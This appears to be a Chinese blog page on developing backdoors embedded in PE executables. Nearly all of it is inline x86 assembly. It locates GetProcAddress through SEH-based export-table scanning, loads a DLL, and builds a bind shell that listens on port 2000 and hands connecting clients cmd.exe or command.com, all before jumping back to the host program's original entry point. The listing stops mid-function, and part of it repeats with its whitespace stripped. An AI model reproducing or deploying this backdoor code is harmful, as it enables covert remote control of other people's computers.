- 浏览: 1108591 次
文章分类
最新评论
-
cuityang:
有没有 tts 语音合成的例子?请站内我 3q
一个Nuance 的语音识别的例子 -
cipherlab:
请教一个问题,sapi : tts 到 内存buff中(wav ...
基于Windows Sdk 与visual C++2008 在微软平台上构架自己的语音朗读引擎(适用于windows 2000/xp2003/vista windows CE /mobile),本项目开源,源码请留下你们的Email,我给大家发 -
cipherlab:
请教一个问题,如何之际 sapi tts 到 内存buff中 ...
基于Windows Sdk 与visual C++2008 在微软平台上构架自己的语音朗读引擎(适用于windows 2000/xp2003/vista windows CE /mobile),本项目开源,源码请留下你们的Email,我给大家发 -
cipherlab:
嗨,你好,哥们!
基于Windows Sdk 与visual C++2008 在微软平台上构架自己的语音朗读引擎(适用于windows 2000/xp2003/vista windows CE /mobile),本项目开源,源码请留下你们的Email,我给大家发 -
zsslxy2006:
565242785@qq.com
感谢!才人哪
年少痴狂,怀恋曾经的创业岁月,语音识别的应用远远未到高潮,本人的软件源码开源,需要的留下Email,我给大家发
PE可执行文件的镶入式程序后门开发
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- */
- #include<STDIO.H>
- #include<WINDOWS.H>
- main()
- {
- _asm
- {
- callex//取得当前地址以计算异常结构开始的地址
- moveax,0x77000000
- mov[ebp-0ch],eax
- moveax,esp
- subeax,8
- xchgfs:[0],eax
- movDWORDptr[ebp-00h],eax
- moveax,fs:[4]
- movDWORDptr[ebp-04h],eax
- movfs:[4h],ebp//保存ebp到fs:[4h]中
- addecx,34h
- pushecx
- pusheax
- movedx,0
- movbyteptr[edx],0//产生错误
- }
- //异常结构开始
- _asm
- {
- movebp,fs:[4]
- movdwordptr[ebp-8h],0
- //for(;imgbase<0xff000000,procgetadd==0;){
- e104f:
- cmpdwordptr[ebp-8h],0
- jneexi
- //imgbase+=0x10000;
- moveax,[ebp-0ch]
- addeax,10000h
- mov[ebp-0ch],eax
- //if(imgbase==0x78000000)imgbase=0xbff00000;
- cmpdwordptr[ebp-0ch],78000000h
- jneis44
- movdwordptr[ebp-0ch],0BFF00000h
- /*if(*(WORD*)imgbase=='ZM'&&*(WORD*)(imgbase+*(int
- *)(imgbase+0x3c))=='EP'){*/
- is44:
- movecx,dwordptr[ebp-0ch]
- xoredx,edx
- movdx,wordptr[ecx]
- movdwordptr[ebp-24h],ecx
- cmpedx,5A4Dh//ZM
- jnee11db
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+3Ch]
- movedx,dwordptr[ebp-0ch]
- xoreax,eax
- movax,wordptr[edx+ecx]
- cmpeax,4550h
- jnee11db
- //fnbase=*(int*)(imgbase+*(int*)(imgbase+0x3c)+0x78)+imgbase;
- movecx,dwordptr[ebp-0ch]
- movedx,dwordptr[ecx+3Ch]
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+edx+78h]
- addecx,dwordptr[ebp-0ch]
- movdwordptr[ebp-10h],ecx
- //k=*(int*)(fnbase+0xc)+imgbase;
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+0Ch]
- addeax,dwordptr[ebp-0ch]
- movdwordptr[ebp-14h],eax
- //if(*(int*)k=='NREK'&&*(int*)(k+4)=='23LE'){
- movecx,dwordptr[ebp-14h]
- cmpdwordptr[ecx],4E52454Bh
- jnee11db
- movedx,dwordptr[ebp-14h]
- cmpdwordptr[edx+4],32334C45h
- jnee11db
- //k=imgbase+*(int*)(fnbase+0x20);
- moveax,dwordptr[ebp-10h]
- movecx,dwordptr[ebp-0ch]
- addecx,dwordptr[eax+20h]
- movdwordptr[ebp-14h],ecx
- //for(l=0;l<*(int*)(fnbase+0x18);++l,k+=4){
- movdwordptr[ebp-18h],0
- jmpe1127
- e1115:
- movedx,dwordptr[ebp-18h]
- addedx,1
- movdwordptr[ebp-18h],edx
- moveax,dwordptr[ebp-14h]
- addeax,4
- movdwordptr[ebp-14h],eax
- e1127:
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ebp-18h]
- cmpedx,dwordptr[ecx+18h]
- jgee11db
- /*if(*(int*)(imgbase+*(int*)k)=='tixE'&&*(int*)(4+imgbase+*(int
- *)k)=='corP'){GetProcAddress*/
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx],'PteG'
- jnee11d6
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx+4],'Acor'
- jnee11d6
- //k=*(WORD*)(l+l+imgbase+*(int*)(fnbase+0x24));
- moveax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+24h]
- xorecx,ecx
- movcx,wordptr[eax+edx]
- movdwordptr[ebp-14h],ecx
- //k+=*(int*)(fnbase+0x10)-1;
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+10h]
- movecx,dwordptr[ebp-14h]
- leaedx,dwordptr[ecx+eax-1]
- movdwordptr[ebp-14h],edx
- //k=*(int*)(k+k+k+k+imgbase+*(int*)(fnbase+0x1c));
- moveax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+1Ch]
- moveax,dwordptr[eax+edx]
- movdwordptr[ebp-14h],eax
- movedx,dwordptr[ebp-14h]
- //addedx,imgbase
- addedx,dwordptr[ebp-0ch]
- //movprocgetadd,edx
- movdwordptr[ebp-8h],edx
- //恢复异常结构
- moveax,DWORDptr[ebp-00h]
- movfs:[0],eax
- moveax,DWORDptr[ebp-04h]
- movfs:[4],eax
- jmpe11db
- e11d6:
- jmpe1115
- e11db:
- jmpe104f
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得LoadLibraryA入口地址
- _asm
- {
- movdwordptr[ebp-124h],'daoL'
- movdwordptr[ebp-120h],'rbiL'
- movdwordptr[ebp-11Ch],'Ayra'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- movebx,dwordptr[ebp-24h]//kernel32.dll入口地址
- pushebx
- moveax,dwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//GetProcAddress入口地址
- calleax
- movdwordptr[ebp-400ch],eax//LoadLibraryA入口地址
- }
- //加载mydll.dll
- _asm
- {
- movdwordptr[ebp-124h],'ldym'
- movdwordptr[ebp-120h],'ld.l'
- movdwordptr[ebp-11Ch],'l'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //取得mybegin入口地址
- movdwordptr[ebp-124h],'gebM'
- movdwordptr[ebp-120h],'ni'
- movdwordptr[ebp-11Ch],0000h
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-4008h]
- movdwordptr[ebp-4030h],eax//mybegin入口地址
- cmpeax,0
- jzexit1
- calleax//执行mybegin
- jmpexit1
- }
- ex:
- _asm
- {
- popecx
- pushecx
- ret
- }
- exit1:
- _asm
- {
- moveax,0x401000//这个跳转地址在代码中需要更改
- jmpeax
- }
- return0;
- }
/* 利用异常结构处理搜索GetProcAddress入口地址 */ #include #include main() { _asm { call ex//取得当前地址以计算异常结构开始的地址 mov eax,0x77000000 mov [ebp-0ch],eax mov eax,esp sub eax,8 xchg fs:[0],eax mov DWORD ptr[ebp-00h],eax mov eax,fs:[4] mov DWORD ptr[ebp-04h],eax mov fs:[4h],ebp//保存ebp到fs:[4h]中 add ecx,34h push ecx push eax mov edx,0 mov byte ptr [edx],0//产生错误 } //异常结构开始 _asm { mov ebp,fs:[4] mov dword ptr [ebp-8h],0 //for(;imgbase<0xff000000,procgetadd==0;){ e104f: cmp dword ptr [ebp-8h],0 jne exi //imgbase+=0x10000; mov eax,[ebp-0ch] add eax,10000h mov [ebp-0ch],eax //if(imgbase==0x78000000) imgbase=0xbff00000; cmp dword ptr [ebp-0ch],78000000h jne is44 mov dword ptr [ebp-0ch],0BFF00000h /*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){*/ is44: mov ecx,dword ptr [ebp-0ch] xor edx,edx mov dx,word ptr [ecx] mov dword ptr [ebp-24h],ecx cmp edx,5A4Dh//ZM jne e11db mov eax,[ebp-0ch] mov ecx,dword ptr [eax+3Ch] mov edx,dword ptr [ebp-0ch] xor eax,eax mov ax,word ptr [edx+ecx] cmp eax,4550h jne e11db //fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; mov ecx,dword ptr [ebp-0ch] mov edx,dword ptr [ecx+3Ch] mov eax,[ebp-0ch] mov ecx,dword ptr [eax+edx+78h] add ecx,dword ptr [ebp-0ch] mov dword ptr [ebp-10h],ecx // k=*(int *)(fnbase+0xc)+imgbase; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+0Ch] add eax,dword ptr [ebp-0ch] mov dword ptr [ebp-14h],eax //if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ mov ecx,dword ptr [ebp-14h] cmp dword ptr [ecx],4E52454Bh jne e11db mov edx,dword ptr [ebp-14h] cmp dword ptr [edx+4],32334C45h jne e11db //k=imgbase+*(int *)(fnbase+0x20); mov eax,dword ptr [ebp-10h] mov ecx,dword ptr [ebp-0ch] add ecx,dword ptr [eax+20h] mov dword ptr [ebp-14h],ecx //for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ mov dword ptr [ebp-18h],0 jmp e1127 e1115: mov edx,dword ptr [ebp-18h] add edx,1 mov dword ptr [ebp-18h],edx mov eax,dword ptr [ebp-14h] add eax,4 mov dword ptr [ebp-14h],eax e1127: mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ebp-18h] cmp edx,dword ptr [ecx+18h] jge e11db /*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int *)k)=='corP'){GetProcAddress*/ mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx],'PteG' jne e11d6 mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx+4],'Acor' jne e11d6 //k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); mov eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+24h] xor ecx,ecx mov cx,word ptr [eax+edx] mov dword ptr [ebp-14h],ecx //k+=*(int *)(fnbase+0x10)-1; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+10h] mov ecx,dword ptr [ebp-14h] lea edx,dword ptr [ecx+eax-1] mov dword ptr [ebp-14h],edx //k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); mov eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+1Ch] mov eax,dword ptr [eax+edx] mov dword ptr [ebp-14h],eax mov edx,dword ptr [ebp-14h] //add edx,imgbase add edx,dword ptr [ebp-0ch] // mov procgetadd,edx mov dword ptr [ebp-8h],edx //恢复异常结构 mov eax,DWORD ptr[ebp-00h] mov fs:[0],eax mov eax,DWORD ptr[ebp-04h] mov fs:[4],eax jmp e11db e11d6: jmp e1115 e11db: jmp e104f } ////////////////////////////////////////////////////////////// exi: //取得LoadLibraryA入口地址 _asm { mov dword ptr [ebp-124h],'daoL' mov dword ptr [ebp-120h],'rbiL' mov dword ptr [ebp-11Ch],'Ayra' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址 push ebx mov eax,dword ptr [ebp-8h] mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址 call eax mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址 } //加载 mydll.dll _asm { mov dword ptr [ebp-124h],'ldym' mov dword ptr [ebp-120h],'ld.l' mov dword ptr [ebp-11Ch],'l' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax call dword ptr [ebp-400ch] cmp eax,0 jz exit1 mov ebx,eax //取得mybegin入口地址 mov dword ptr [ebp-124h],'gebM' mov dword ptr [ebp-120h],'ni' mov dword ptr [ebp-11Ch],0000h mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax push ebx call dword ptr [ebp-4008h] mov dword ptr [ebp-4030h],eax//mybegin入口地址 cmp eax,0 jz exit1 call eax //执行mybegin jmp exit1 } ex: _asm { pop ecx push ecx ret } exit1: _asm { mov eax,0x401000 //这个跳转地址在代码中需要更改 jmp eax } return 0; }
<script src="/inc/gg_read2.js"></script>
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- 然后用这个函数加载其他api函数.实现线程一个返回另一个
- 绑定cmd.exe或command.com功能
- */
- #include<STDIO.H>
- #include<WINDOWS.H>
- main()
- {
- _asm
- {
- callex
- moveax,0x77000000
- mov[ebp-0ch],eax
- moveax,esp
- subeax,8
- xchgfs:[0],eax
- movDWORDptr[ebp-00h],eax
- moveax,fs:[4]
- movDWORDptr[ebp-04h],eax
- movfs:[4h],ebp
- addecx,34h
- pushecx
- pusheax
- movedx,0
- movbyteptr[edx],0
- movebp,fs:[4]
- movdwordptr[ebp-8h],0
- e104f:
- cmpdwordptr[ebp-8h],0
- jneexi
- moveax,[ebp-0ch]
- addeax,10000h
- mov[ebp-0ch],eax
- cmpdwordptr[ebp-0ch],78000000h
- jneis44
- movdwordptr[ebp-0ch],0BFF00000h
- is44:
- movecx,dwordptr[ebp-0ch]
- xoredx,edx
- movdx,wordptr[ecx]
- movdwordptr[ebp-24h],ecx
- cmpedx,5A4Dh//ZM
- jnee11db
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+3Ch]
- movedx,dwordptr[ebp-0ch]
- xoreax,eax
- movax,wordptr[edx+ecx]
- cmpeax,4550h
- jnee11db
- movecx,dwordptr[ebp-0ch]
- movedx,dwordptr[ecx+3Ch]
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+edx+78h]
- addecx,dwordptr[ebp-0ch]
- movdwordptr[ebp-10h],ecx
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+0Ch]
- addeax,dwordptr[ebp-0ch]
- movdwordptr[ebp-14h],eax
- movecx,dwordptr[ebp-14h]
- cmpdwordptr[ecx],4E52454Bh
- jnee11db
- movedx,dwordptr[ebp-14h]
- cmpdwordptr[edx+4],32334C45h
- jnee11db
- moveax,dwordptr[ebp-10h]
- movecx,dwordptr[ebp-0ch]
- addecx,dwordptr[eax+20h]
- movdwordptr[ebp-14h],ecx
- movdwordptr[ebp-18h],0
- jmpe1127
- e1115:
- movedx,dwordptr[ebp-18h]
- addedx,1
- movdwordptr[ebp-18h],edx
- moveax,dwordptr[ebp-14h]
- addeax,4
- movdwordptr[ebp-14h],eax
- e1127:
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ebp-18h]
- cmpedx,dwordptr[ecx+18h]
- jgee11db
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx],'PteG'
- jnee11d6
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx+4],'Acor'
- jnee11d6
- moveax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+24h]
- xorecx,ecx
- movcx,wordptr[eax+edx]
- movdwordptr[ebp-14h],ecx
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+10h]
- movecx,dwordptr[ebp-14h]
- leaedx,dwordptr[ecx+eax-1]
- movdwordptr[ebp-14h],edx
- moveax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+1Ch]
- moveax,dwordptr[eax+edx]
- movdwordptr[ebp-14h],eax
- movedx,dwordptr[ebp-14h]
- addedx,dwordptr[ebp-0ch]
- movdwordptr[ebp-8h],edx
- //恢复异常结构
- moveax,DWORDptr[ebp-00h]
- movfs:[0],eax
- moveax,DWORDptr[ebp-04h]
- movfs:[4],eax
- jmpe11db
- e11d6:
- jmpe1115
- e11db:
- jmpe104f
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得各个需要函数的地址
- //取得LoadLibraryA入口地址
- _asm
- {
- callex1
- movdwordptr[ecx-0C70h],ebp
- movdwordptr[ebp-124h],'daoL'
- movdwordptr[ebp-120h],'rbiL'
- movdwordptr[ebp-11Ch],'Ayra'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- movebx,dwordptr[ebp-24h]//kernel32.dll入口地址
- pushebx
- moveax,dwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//GetProcAddress入口地址
- calleax
- movdwordptr[ebp-400ch],eax//LoadLibraryA入口地址
- //CreatePipe入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'iPet'
- movdwordptr[ebp-11Ch],'ep'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4000h],eax//CreatePipe入口地址
- cmpeax,0
- jzexit1
- //GetVersion入口地址
- movdwordptr[ebp-124h],'VteG'
- movdwordptr[ebp-120h],'isre'
- movdwordptr[ebp-11Ch],'no'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4004h],eax//GetVersion入口地址
- cmpeax,0
- jzexit1
- //CloseHandle入口地址
- movdwordptr[ebp-124h],'solC'
- movdwordptr[ebp-120h],'naHe'
- movdwordptr[ebp-11Ch],'eld'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4010h],eax//CloseHandle入口地址
- cmpeax,0
- jzexit1
- //ExitThread入口地址
- movdwordptr[ebp-124h],'tixE'
- movdwordptr[ebp-120h],'erhT'
- movdwordptr[ebp-11Ch],'da'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4014h],eax//ExitThread入口地址
- cmpeax,0
- jzexit1
- //Sleep入口地址
- movdwordptr[ebp-124h],'eelS'
- movdwordptr[ebp-120h],'p'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4018h],eax//Sleep入口地址
- cmpeax,0
- jzexit1
- //WriteFile入口地址
- movdwordptr[ebp-124h],'tirW'
- movdwordptr[ebp-120h],'liFe'
- movdwordptr[ebp-11Ch],'e'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-401Ch],eax//WriteFile入口地址
- cmpeax,0
- jzexit1
- //PeekNamedPipe入口地址
- movdwordptr[ebp-124h],'keeP'
- movdwordptr[ebp-120h],'emaN'
- movdwordptr[ebp-11Ch],'piPd'
- movdwordptr[ebp-118h],'e'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4020h],eax//PeekNamedPipe入口地址
- cmpeax,0
- jzexit1
- //ReadFile入口地址
- movdwordptr[ebp-124h],'daeR'
- movdwordptr[ebp-120h],'eliF'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4024h],eax//ReadFile入口地址
- cmpeax,0
- jzexit1
- //GetStartupInfoA入口地址
- movdwordptr[ebp-124h],'SteG'
- movdwordptr[ebp-120h],'trat'
- movdwordptr[ebp-11Ch],'nIpu'
- movdwordptr[ebp-118h],'Aof'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4028h],eax//GetStartupInfoA入口地址
- cmpeax,0
- jzexit1
- //CreateProcessA入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'rPet'
- movdwordptr[ebp-11Ch],'seco'
- movdwordptr[ebp-118h],'As'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-402Ch],eax//CreateProcessA入口地址
- cmpeax,0
- jzexit1
- //CreateThread入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'hTet'
- movdwordptr[ebp-11Ch],'daer'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//CreateThread入口地址
- cmpeax,0
- jzexit1
- }
- //loadwsock32.dll
- _asm
- {
- movdwordptr[ebp-124h],'cosw'
- movdwordptr[ebp-120h],'.23k'
- movdwordptr[ebp-11Ch],'lld'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //WSAStartup入口地址
- movdwordptr[ebp-124h],'SASW'
- movdwordptr[ebp-120h],'trat'
- movdwordptr[ebp-11Ch],'pu'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4030h],eax//WSAStartup入口地址
- cmpeax,0
- jzexit1
- //__WSAFDIsSet入口地址
- movdwordptr[ebp-124h],'SW__'
- movdwordptr[ebp-120h],'IDFA'
- movdwordptr[ebp-11Ch],'teSs'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4034h],eax//__WSAFDIsSet入口地址
- cmpeax,0
- jzexit1
- //socket入口地址
- movdwordptr[ebp-124h],'kcos'
- movdwordptr[ebp-120h],'te'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4038h],eax//socket入口地址
- cmpeax,0
- jzexit1
- //closesocket入口地址
- movdwordptr[ebp-124h],'solc'
- movdwordptr[ebp-120h],'cose'
- movdwordptr[ebp-11Ch],'tek'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-403Ch],eax//closesocket入口地址
- cmpeax,0
- jzexit1
- //select入口地址
- movdwordptr[ebp-124h],'eles'
- movdwordptr[ebp-120h],'tc'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4040h],eax//select入口地址
- cmpeax,0
- jzexit1
- //recv入口地址
- movdwordptr[ebp-124h],'vcer'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4044h],eax//recv入口地址
- cmpeax,0
- jzexit1
- //send入口地址
- movdwordptr[ebp-124h],'dnes'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4048h],eax//send入口地址
- cmpeax,0
- jzexit1
- //htons入口地址
- movdwordptr[ebp-124h],'noth'
- movdwordptr[ebp-120h],'s'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-404Ch],eax//htons入口地址
- cmpeax,0
- jzexit1
- //bind入口地址
- movdwordptr[ebp-124h],'dnib'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4050h],eax//bind入口地址
- cmpeax,0
- jzexit1
- //listen入口地址
- movdwordptr[ebp-124h],'tsil'
- movdwordptr[ebp-120h],'ne'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4054h],eax//listen入口地址
- cmpeax,0
- jzexit1
- //accept入口地址
- movdwordptr[ebp-124h],'ecca'
- movdwordptr[ebp-120h],'tp'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4058h],eax//accept入口地址
- cmpeax,0
- jzexit1
- }
- //loadmsvcrt.dll
- _asm
- {
- movdwordptr[ebp-124h],'cvsm'
- movdwordptr[ebp-120h],'d.tr'
- movdwordptr[ebp-11Ch],'ll'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //memset入口地址
- movdwordptr[ebp-124h],'smem'
- movdwordptr[ebp-120h],'te'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4090h],eax//memset入口地址
- cmpeax,0
- jzexit1
- }
- //////////////////////////////////////////////////////////////
- //建立后门线程
- /////////////////////////////////////////////////////////////
- _asm
- {
- callex
- addecx,32h//取得后门代码的地址
- movdwordptr[ebp-8],1
- movdwordptr[ebp-0Ch],0
- movdwordptr[ebp-10h],0Ch
- leaeax,[ebp-4]
- pusheax
- push0
- push0
- pushecx
- push0
- leaecx,[ebp-10h]
- pushecx
- calldwordptr[ebp-4008h]
- callexit1//返回真正的代码
- }
- //////////////////////////////////////////////////////////////
- //建立后门
- /////////////////////////////////////////////////////////////
- _asm
- {
- moveax,0x400
- callex1
- movebp,dwordptr[ecx-0C70h]
- movbyteptr[ebp-1340h],0Dh
- movdwordptr[ebp-11ECh],0FFFFFFFFh
- movdwordptr[ebp-1DCh],0
- movdwordptr[ebp-1D8h],32h
- movdwordptr[ebp-1E4h],10h
- calldwordptr[ebp-4004h]
- cmpeax,80000000h
- jnbloc_0040106C
- movdwordptr[ebp-11ECh],1
- movdwordptr[ebp-4118h],'.dmc'
- movdwordptr[ebp-4114h],'exe'
- movdwordptr[ebp-4110h],00000000h
- jmploc_0040107D
- loc_0040106C:
- movdwordptr[ebp-11ECh],0
- movdwordptr[ebp-4118h],'mmoc'
- movdwordptr[ebp-4114h],'.dna'
- movdwordptr[ebp-4110h],'moc'
- loc_0040107D:
- leaeax,[ebp-1D4h]
- pusheax
- push101h
- calldwordptr[ebp-4030h]
- push0
- push1
- push2
- calldwordptr[ebp-4038h]
- mov[ebp-30h],eax
- push0
- push1
- push2
- calldwordptr[ebp-4038h]
- mov[ebp-12F8h],eax
- movwordptr[ebp-28h],2
- push7D0h
- calldwordptr[ebp-404Ch]
- mov[ebp-26h],ax
- movdwordptr[ebp-24h],0
- movdwordptr[ebp-44h],0Ch
- movdwordptr[ebp-40h],0
- movdwordptr[ebp-3Ch],1
- push10h
- leaecx,[ebp-28h]
- pushecx
- movedx,[ebp-30h]
- pushedx
- calldwordptr[ebp-4050h]
- push2
- moveax,[ebp-30h]
- pusheax
- calldwordptr[ebp-4054h]
- loc_004010F7:
- leaecx,[ebp-1E4h]
- pushecx
- leaedx,[ebp-28h]
- pushedx
- moveax,[ebp-30h]
- pusheax
- calldwordptr[ebp-4058h]
- mov[ebp-12F8h],eax
- cmpdwordptr[ebp-12F8h],0FFFFFFFFh
- jnzloc_00401121
- xoreax,eax
- jmploc_00401419
- loc_00401121:
- push0
- leaecx,[ebp-44h]
- pushecx
- leaedx,[ebp-34h]
- pushedx
- leaeax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4000h]
- testeax,eax
- jnzloc_00401140
- xoreax,eax
- jmploc_00401419
- loc_00401140:
- push0
- leaecx,[ebp-44h]
- pushecx
- leaedx,[ebp-1E0h]
- pushedx
- leaeax,[ebp-2Ch]
- pusheax
- calldwordptr[ebp-4000h]
- push44h
- push0
- leaecx,[ebp-133Ch]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- leaedx,[ebp-133Ch]
- pushedx
- calldwordptr[ebp-4028h]
- movdwordptr[ebp-133Ch],44h
- movdwordptr[ebp-1310h],101h
- movwordptr[ebp-130Ch],0
- moveax,[ebp-34h]
- mov[ebp-12FCh],eax
- movecx,[ebp-2Ch]
- mov[ebp-1304h],ecx
- movedx,[ebp-34h]
- mov[ebp-1300h],edx
- leaeax,[ebp-14h]
- pusheax
- leaecx,[ebp-133Ch]
- pushecx
- push0
- push0
- push0
- push1
- push0
- push0
- leaedx,[ebp-4118h]
- pushedx
- push0
- calldwordptr[ebp-402Ch]
- testeax,eax
- jnzloc_004011DD
- xoreax,eax
- jmploc_00401419
- loc_004011DD:
- push0C8h
- calldwordptr[ebp-4018h]
- loc_004011E8:
- moveax,1
- testeax,eax
- jeloc_004013C8
- push1000h
- push0
